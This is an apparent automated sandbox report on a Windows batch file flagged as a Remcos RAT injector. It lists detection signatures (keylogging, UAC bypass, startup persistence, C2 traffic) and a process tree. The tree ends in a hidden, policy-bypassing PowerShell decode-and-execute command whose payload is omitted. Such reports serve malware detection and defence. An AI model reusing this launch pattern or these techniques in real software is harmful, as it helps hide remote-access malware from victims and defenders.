Windows
Analysis Report
DHM6454.bat
Overview
General Information
Detection
Batch Injector, Remcos
Score: 100
Range: 0 - 100
Confidence: 100%
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Batch Injector
Yara detected Powershell decode and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses dynamic DNS services
Abnormal high CPU Usage
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 4576 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\DHM6454.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 4060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 4992 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\DHM6454.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 5004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6220 cmdline:
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('[base64-encoded PowerShell payload omitted]